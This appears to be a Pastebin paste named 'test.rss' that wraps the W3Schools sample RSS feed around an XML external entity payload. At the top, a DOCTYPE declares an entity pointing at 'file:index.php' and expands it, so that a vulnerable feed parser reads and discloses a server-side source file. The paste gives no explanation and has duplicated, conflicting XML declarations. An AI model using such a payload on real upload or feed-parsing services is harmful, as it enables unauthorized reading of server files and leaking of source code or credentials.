Advertisement
Guest User

test.rss

a guest
Oct 22nd, 2019
107
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.71 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8" ?>
  2. <?xml version="1.0" encoding="ISO-8859-1"?>
  3. <!DOCTYPE foo [
  4. <!ELEMENT foo ANY >
  5. <!ENTITY xxe SYSTEM "file:index.php" >]><foo>&xxe;</foo>
  6. <rss version="2.0">
  7.  
  8. <channel>
  9. <title>W3Schools Home Page</title>
  10. <link>https://www.w3schools.com</link>
  11. <description>Free web building tutorials</description>
  12. <item>
  13. <title>RSS Tutorial</title>
  14. <link>https://www.w3schools.com/xml/xml_rss.asp</link>
  15. <description>New RSS tutorial on W3Schools</description>
  16. </item>
  17. <item>
  18. <title>XML Tutorial</title>
  19. <link>https://www.w3schools.com/xml</link>
  20. <description>New XML tutorial on W3Schools</description>
  21. </item>
  22. </channel>
  23.  
  24. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement